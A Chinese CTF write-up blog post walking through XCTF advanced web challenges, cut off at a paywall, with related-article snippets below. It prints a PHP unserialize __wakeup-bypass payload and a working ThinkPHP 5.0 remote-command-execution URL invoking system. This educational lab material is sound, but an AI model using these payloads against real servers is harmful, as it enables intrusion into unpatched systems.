攻防世界 web 进阶题 001-012

最新推荐文章于 2025-01-13 00:36:47 发布
原创 最新推荐文章于 2025-01-13 00:36:47 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web

本文解析了一系列CTF网络安全挑战赛中的题目,涵盖SQL注入、PHP代码审计、远程命令执行等多种安全漏洞利用技巧。

目录

001 baby_web

002 Training-WWW-Robots

003 Web_php_unserialize

004 php_rce

005 web_php_include

006.supersqli

007.ics-06

008.warmup

009 NewsCenter

010 NaNNaNNaNNaN-Batman

011  web2

012  PHP2

001 baby_web

题目:

方法一:
访问index.php,同时burp抓包,发给repeater分析,go,查看响应头,会得到flag。
方法二:
火狐浏览器,访问index.php,按F12,在网络部分中,响应头里有flag。收获:项目入口文件index.php.index.php文件是一个php网站首页文件,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx。(取材于某度)

 

002 Training-WWW-Robots

题目:打开会看到百度翻译:在这个小小的训练挑战中,您将了解Robots_exclusion_standard。
txt文件被网络爬虫用来检查他们是否被允许爬行和索引你的网站,或仅仅它的一部分。
有时这些文件会显示目录结构,而不是保护内容不被抓取。
享受吧!
查一下关于robots.txt的资料.
方法:访问robots.txt,结果如下
然后继续访问,f10g.php,得到flag.

收获:当一个搜索机器人(有的叫搜索蜘蛛)访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,那么搜索机器人就沿着链接抓取。并且,robots.txt必须放在一个站点的根目录下,而且文件名必须是小写。robots.txt就是告知搜索引擎哪些是允许访问的,哪些是不想被搜索引擎收录的。如果您希望搜索引擎收录网站上所有内容,请勿建立robots.txt文件。但是,robots.txt不是防火墙,不能阻止访问。

 

003 Web_php_unserialize

题目:打开后是这样一堆代码,那就是要进行代码审计了

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

1. isset()函数作用事检测变量是否存在,

若变量不存在则返回false;

若变量存在但是其值为null,也返回false;

若变量存在且其值不为null,则返回true.

2.  _construct(),类的构造函数;

     _destruct(),类的析构函数。

3. highlight_file(file) ,高亮显示出文件。

分析一下:首先是绕过正则匹配,然后进行反序列化,反序列化函数执行前,会执行wakeup()函数,故还要绕过wakeup()函数:
绕过正则匹配可以在//O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}中
4前面加上‘+’,   1表示Demo类的变量数
而wakeup()函数 当成员属性数目大于实际数目时可绕过wakeup方法  故把1改为2  

O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}
然后进行base64编码,然后传参,即可得到flag.

__sleep() 当调用searialize()方法时调用,返回值为数组,表示需要序列化的数据项.
__wakeup() 当调用unsearizlie()方法时调用。一般用来在唤醒时初始化资源对象.

#python代码
import base64
 
st = 'O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}'.encode()#默认以utf8编码
res = base64.b64encode(st)
print(res.decode())#默认以utf8解码
res = base64.b64decode(res)
print(res.decode())#默认以utf8解码

#结果:TzorNDoiRGVtbyI6Mjp7czoxMDoiIERlbW8gZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
#O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}

 (注意:不要用在线base64编码,我当时搞了好久,最后发现在线编码得出的结果不太正确),下面是payload.

index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

 或者可以用requests库

 

注意:

1.编码与解码的处理对象是byte,故对原数据要先编码,使原本的str类型变成byte,解码后直接输出来的是byte对象,故要解码成str对象。

2.%20是网页地址的空格符。html中的空格符是& nbsp;因为地址不能包含空格。它是序列化后的空格符。
在url传递参数的时候,一般都会序列化一下,以保证参数的安全。

 

004 php_rce

题目:打开题目后,看到如图:
发现是一个ThinkPHP的框架而且正好是v5.0版本。这个版本存在远程命令执行的漏洞,程序未对控制器进行过滤,导致攻击者可以通过\符号调用任意类。
方法一:利用system函数远程命令执行
使用payload

 /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../../

来列出当前目录。


发现有如上图显示,但

最低0.47元/天 解锁文章
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1988
简单的渗透工具sqlmap使用
xctf攻防世界 Web高手进阶区 ics-07
l8947943的博客
01-01 744
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问 这个还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
burpsuite抓包及密码爆破实践(需要安装包的留言)
W_seventeen的博客
12-02 1623
安装burpsuite 照着视频,网上的教程尝试了好久,结果自己电脑的环境因为之前装Eclipse java的时候装了jdk13,而burpsuite用不了13的,我又费了半天劲又是注册甲骨文账号,又是下载jdk8。(吐槽下我的电脑,现在越来越垃圾了,卡的一比)需要burpsuite安装包的可以留言。 然后在火狐浏览器里面设置网络代理选择手动代理,打开burpsuite,选择代理,选择选项。然后将...
靶场训练笔记-ctf训练营WEB方向第一章新手村1第6:ezinclude
ddingddding的博客
08-21 1115
对网址为ctf.hetianlab.com的ctf训练营WEB方向第一章新手村1第6:ezinclude的做全过程
攻防世界 web 新手小结
热门推荐
Sk1y的博客
10-20 2万+
01view_source 方法:在下用的firefox,鼠标右键可查看页面源代码,试了试不行。那么F12,即可得到。01收获:鼠标右键不能用,与前端函数有关,在该页面中我们可以发现有这两个函数, 1. document.oncontextmenu=new Function("return false")是右键菜单禁用; 2. document.onselectstart=new Function("return false")是禁止选中页面上的内容; 3. document.onselectsta
漏洞扫描期中
weixin_57476683的博客
04-28 1105
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CFT基础知识1.1 CTF简介1.2 竞赛模式1.3 比赛形式1.4 目类型二、Web(信息泄露下)2.1 目录遍历2.2 PHPINFO2.3 备份文件下载2.3.1 网源代码2.3.2 bak文件2.3.3 vim缓存2.3.4 .DS_Store总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习.
攻防世界web进阶区i-got-id-200
gongjingege的博客
08-06 558
打开链接,有三个链接地址 挨个看一哈 发现在url栏都是以.pl结尾,百度一下是perl编写的(很好,不懂) 看一下源码,也没要求上传什么文件 但是会把文件内容打印出来 这里看大佬讲的是param()函数 param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的接收变量中。如果我们传入一个ARGV的文件,那么Perl会将传入的参数作为文件名读出来。对正常的上传文件进行修改,可以达到读取任意文件的目的 bp抓包 将上传文件的代码复制,粘贴,删除filename=“”,加上ARV
攻防世界WEB进阶之ics-05
harry_c的博客
08-24 2912
攻防世界WEB进阶之ics-051、描述2、实操3、答案 1、描述 难度系数: 3星 目来源: XCTF 4th-CyberEarth 目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 目场景: 点击获取在线场景 目附件: 暂无 首先打开场景,进入系统设备维护中心,没有发现什么,查找到相关漏洞一个,查看源码: 2、实操 使用 http://111.198.29.45:449...
攻防世界web进阶区ics-05详解
hxhxhxhxx的博客
08-06 4243
攻防世界web进阶区ics-05详解目解法 目 我们只能点击一个地方 解法 御剑扫描有一个css的文件 没有什么作用 发现又点了一次的时候,url发生了改变 因为是php的页面,我们试试php伪协议读取文件 http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php <?php error_reporting(0); @session_s
震惊!!! ctfshow解思路
2301_78362619的博客
12-18 1868
搞渗透的流程 学习渗透 能够让你看得懂 一步一步的往上走
CTF.show 文件包含
m0_64444909的博客
08-25 2095
ctf文件包含
PHP-伪协议
摘星怪sec的blog
04-25 9222
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
ctfshow,命令执行系列
m0_73500273的博客
06-19 413
屏蔽的阐述有点多,采用文件包含。先让他多获取一个参数 a 并且执行就要用到include但是要加空格,空格被屏蔽了,尝试用进行转码有%0A是空格就有include%0A$_GET[a]这就是获取参数,下面就是构造文件了,这里哟啊用到php伪协议,使用data://进行执行 data://text/plain,后发现有两文件,使用tac进行读取。
PHP 反序列化
2401_87620236的博客
01-13 1620
PHP 反序列化漏洞又叫做 PHP 对象注入漏洞,是因为程序对输入数据处理不当导致的,反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,所以反序列化漏洞的前提是必须包含 unserailize() 函数且 unserailize() 函数的参数可控(为了成功达到控制你输入的参数所实现的功能,可能需要绕过一些魔法函数)每个类的定义都以关键字 class 开头,后面跟着类的名字。我们能控制的只有类的属性,攻击就是寻找合适能被控制的属性,利用作用域本身存在的方法,基于属性发动攻击。
flag in flag.php,hgame2019解记录
weixin_42531128的博客
03-17 1202
“想与你赏流河山川,踏青山风光无限,樵采打渔为生,尽是梦里的人间。”菜鸡来写wp啦…Level - Week 1WEB谁吃了我的flagfirst根据目描述,vim、未正常关机…估计也就是考察vimbak的知识,意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。第一次产生的交换文件名为“.file.txt.swp”;再次意...
一道简单的SSRF
m0_56059226的博客
05-15 840
看到了一道简单的ssrf,由于说有非预期但是忘了这个知识点,所以还是记录一下 目进去后就是一串代码 <?php highlight_file(__FILE__); //find something in flag1.php $d = $_GET['d']; $file = $_GET['ctf']; if (filter_var($d, FILTER_VALIDATE_URL)) { $r = parse_url($d); if (isset($file)) {
CTF web 型解技巧-第一课 思路讲解
moRickyer的博客
11-26 4619
原定六月前学完的内容要延后了,先顾工作,后顾学习~对之前学习内容的总结:CTF web 型解技巧-第一课 思路讲解;之后会有关于CTF-WEB第二课、第三课等内容。 引用亮神的话: 如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。 ----Micropoor 侯亮大神说:知识的最高的境界是分享,而在我看来,我们在分享的同时也是对自我认知的一个提升。 image.png 以下内容大多是我在学习过程中,借鉴前人经
php反序列化漏洞入门知识
alert['Hello World']
01-25 883
目录 什么是php序列化? serialize()实例 数组序列化实例 对象序列化实例​ unserialize()实例 数组序列化实例 对象序列化实例 序列化字符串格式解析 变量类型 public、private、protected序列化后的区别 魔术方法 常见的魔术方法 方法调用实例 __sleep() __wakeup() __toString() 反序列化漏洞原理 参考链接
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2201
web安全-PHP反序列化漏洞
攻防世界wtf.sh-150目信息与目要求
最新发布
11-20
- 目名称:wtf.sh - 150(来自攻防世界web进阶区)。 - 类型:这是一个WEB安全目,涉及Shell脚本知识(.sh文件)。 - 背景:攻防世界是一个网络安全学习平台,目通常涉及渗透测试、漏洞利用等。 - 具体内容:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值